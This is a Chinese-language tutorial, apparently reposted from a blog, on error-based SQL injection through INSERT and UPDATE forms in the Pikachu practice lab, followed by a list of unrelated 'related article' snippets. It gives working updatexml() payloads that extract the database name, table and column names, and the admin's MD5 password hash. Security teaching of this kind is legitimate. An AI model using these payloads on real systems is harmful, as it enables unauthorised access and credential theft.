8.SQL注入-基于insert,update利用案例

SQL注入-基于insert/update利用案例

sql语句正常插入表中的数据

insert into member(username,pw,sex,phonenum,address,email) values('xiaoqiang',1111,1,2,3,4);
select * from member;

例如插入小强数据,如图所示:
在这里插入图片描述

采用or这个运算符,构造闭合语句

values('xiaoqiang' or   or '',1111,1,2,3,4);

‘xiaoqinag’ or __ or 中后面的那个or后的单引号是为了闭合掉语句后面本身带有的单引号。而前面第一个or后是我们要填的注入语句。
这里还是用后台报错的方法来构造payload,且有必要提到的是,这里我们还用的了updatexmal()
在这里插入图片描述

基于insert语句下的报错:
暴库payload语句

xiaoqiang' or updatexml(1,concat(0x7e,database()),0)  or '

爆出数据库:pikachu 如图所示:
在这里插入图片描述

基于insert利用案例(与update是一样的)

通过前端网页进行测试,点击insert注入->注册,必填项输入单引号,看后台会执行报错不
在这里插入图片描述

发现被后台数据执行,返回报错信息sql语句错误
在这里插入图片描述

输入payload爆库语句进行测试,查看结果

xiaoqiang' or updatexml(1,concat(0x7e,database()),0)  or '

发现数据库已经显示pikachu
在这里插入图片描述

输入payload爆表名称语句,也是要加limit参数,一次一次的去测试

xiaoqiang' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1)),0)  or '

发现表名称为users比较敏感
在这里插入图片描述

根据已知的表名进行爆列字段的payload语句,一次一次进行测试

xiaoqiang' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1)),0)  or '

爆出字段用户名username
在这里插入图片描述

爆出字段密码:password
在这里插入图片描述

爆出用户名和密码的payload语句

xiaoqiang' or updatexml(1,concat(0x7e,(select username from users limit 0,1)),0)  or '

发现高级用户admin
在这里插入图片描述

根据已知的表名,用户名,进行爆出密码的payload语句

xiaoqiang' or updatexml(1,concat(0x7e,(select password from users where username='admin' limit 0,1)),0)  or '

爆出md5值密码,被加密了,可以进行解密,即可;
在这里插入图片描述

基于update利用案例(与insert是一样的)

例如:还是用暴库语句,基于报错:
xiaoqiang’ or updatexml(1,concat(0x7e,database()),0) or ’
登录lucy的账号,进行修改数据,输入payload语句进行暴库
在这里插入图片描述

如果所示,库名被暴漏出来,接下来同上一样的操作,这里就不演示了;
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/39693.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

实测有效:Win11右键默认显示更多

Win11最大的变化之一莫过于右键菜单发生了变化,最大的问题是什么,是右键菜单很多时候需要点两次,实在是反人类 第一步 复制以下命令直接运行: reg.exe add "HKCU\Software\Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905ba…

python_zabbix

zabbix官网地址:19. API19. APIhttps://www.zabbix.com/documentation/4.2/zh/manual/api 每个版本可以有些差异,选择目前的版本在查看对于的api接口#token接口代码 import requests apiurl "http://zabbix地址/api_jsonrpc.php" data {&quo…

web的学习和开发

这个使同步和异步的区别 今天主要就是学了一些前端,搞了一些前端的页面,之后准备学一下后端。 我写的这个项目使百度贴吧,还没有写er图。 先看一下主界面是什么样子的。 这个是主界面,将来后面的主要功能点基本上全部是放在这个上…

推动能源绿色低碳发展,风机巡检进入国产超高清+AI时代

全球绿色低碳能源数字转型发展正在进入一个重要窗口期。风电作为一种清洁能源,在碳中和过程中扮演重要角色,但风电场运维却是一件十足的“苦差事”。 传统的风机叶片人工巡检方式主要依靠巡检人员利用高倍望远镜检查、高空绕行下降目测检查(蜘蛛人)、叶…

STM32——Modbus协议

一、Modbus协议简介: 1.modbus介绍: Modbus是一种串行通信协议,是Modicon公司(现在的施耐德电气 Schneider Electric)于1979年为使用可编程逻辑控制器(PLC)通信而发表。Modbus已经成为工业领域…

PythonConda系列(亲测有效):【解决方案】Collecting package metadata (current_repodata.json): failed

【解决方案】Collecting package metadata (current_repodata.json): failed 问题描述解决方案小结参考文献 问题描述 在cmd下运行:conda install pylint -y,报错如下: C:\Users\apr> conda install --name apr pylint -y Co…

PDF压缩工具选哪个?6款免费PDF压缩工具分享

PDF文件已经成为一种常见的文档格式。然而,PDF文件的体积有时可能非常庞大,尤其是在包含大量图像或复杂格式的情况下。选择一个高效的PDF压缩工具就显得尤为重要。小编今天给大家整理了2024年6款市面上反响不错的PDF压缩文件工具。轻松帮助你找到最适合自…

漆包线行业生产管理革新:万界星空科技MES系统解决方案

一、引言 在科技日新月异的今天,万界星空科技凭借其在智能制造领域的深厚积累,为漆包线行业量身打造了一套先进的生产管理执行系统(MES)解决方案。随着市场竞争的加剧,漆包线作为电气设备的核心材料,其生产…

React+TS前台项目实战(二十四)-- 绘制组件Qrcode封装

文章目录 前言Qrcode组件1. 功能分析2. 代码详细注释3. 使用方式4. 效果展示(pc端 / 移动端) 总结 前言 今天要封装的Qrcode 组件,是通过传入的信息,绘制在二维码上,可用于很多场景,如区块链项目中的区块显示交易地址时就可以用到…

无人值守停车场管理系统具备哪些功能?无人值守收费停车场系统多少钱

随着城市化进程的加快,停车难已成为制约城市发展的一个突出问题。在传统停车场管理中,人工收费、车辆登记等环节不仅效率低下,而且容易出错。无人值守停车系统的出现,无人值守停车场系统以其高效、智能的特点,通过集成…

Meta 3D Gen:文生 3D 模型

是由 Meta 公布的一个利用 Meta AssetGen(模型生成)和 TextureGen(贴图材质生成)的组合 AI 系统,可以在分分钟内生成高质量 3D 模型和高分辨率贴图纹理。 视频演示的效果非常好,目前只有论文,期…

telegram mini app和game实现登录功能

接上一篇文章,我们在创建好telegram机器人后,开始开发小游戏或者mini App,那就避免不了登录功能。 公开链接 bot设置教程:https://lengmo714.top/6e79860b.html 参考教程参考教程,telegram已经给我们提供非常多的api,我们在获取用…

package.json配置详解

package.json文件 执行 npm init 命令,会在当前目录生成一个 package.json 文件 这个文档是你需要知道的关于你的 package.json 文件中需要什么的所有信息。它必须是实际的 JSON,而不仅仅是一个 JavaScript 对象文字。 //package.json {//如果你打算发…

使用vue动态给同一个a标签添加内容 并给a标签设置hover,悬浮文字变色,结果鼠标悬浮有的字上面不变色

如果Vue的虚拟DOM更新机制导致样式更新不及时,你可以尝试以下几种方法来解决这个问题: 确保使用响应式数据: 确保你使用的数据是响应式的,并且任何对这些数据的更改都会触发视图的更新。在Vue中,你应该使用data对象中的…

多源BFS——AcWing 173. 矩阵距离

多源BFS 定义 多源BFS(多源广度优先搜索)是一种图遍历算法,它是标准BFS(广度优先搜索)的扩展,主要用于解决具有多个起始节点的最短路径问题。在多源BFS中,不是从单一源点开始搜索整个图&#…

怎么把webp格式转换成jpg?5个图片格式转换方法全面解析(2024最新)

webp 图片常用于网站,可显著改善页面的浏览和加载体验。然而,许多设备(如苹果手机设备、安卓手机等)不支持webp文件。在这些设备上查看webp文件时,最佳做法是将其转换为其他常见格式,如jpg或 png。Windows电…

LeetCode 69. x 的平方根

更多题解尽在 https://sugar.matrixlab.dev/algorithm 每日更新。 组队打卡&#xff0c;更多解法等你一起来参与哦&#xff01; LeetCode 69. x 的平方根 &#xff0c;难度简单。 暴力 解题思路&#xff1a;直接遍历平方 i&#xff0c; 判断 x 是否满足 i 2 ≤ x < ( i …

2024上海大学生程序设计竞赛I-六元组计数原根知识详解

以前基本没有了解原根相关的一块内容&#xff0c;最近正好碰到了这个题&#xff0c;于是写一篇博客记录一下。 这道题的总体思路就是比较明显&#xff0c;就是先算出 a p x a^px apx对于每个 x x x的解的个数&#xff0c;然后NTT算一下即可。 先来讲一下怎么求欧拉函数 ϕ ( …

前端FCP指标优化

优化前 第三方依赖按需引入之后&#xff0c;打包的总体积减小到初始值的55%&#xff0c;但是依然存在很大的js文件&#xff0c;需要继续优化 chunk-vendors.js进行分包之后 截图 compression-webpack-plugin压缩之后 截图

简单制作基础的Python镜像

拉取基础镜像 以Ubuntu24示例 docker pull ubuntu:24.04 启动 docker run -it -d --name ubuntu24 ubuntu:24.04 进入docker docker exec -it ubuntu24 /bin/bash 更新依赖 apt update apt full-upgrade 安装pip 会自动安装python3.11.7 apt install pip 支持中文…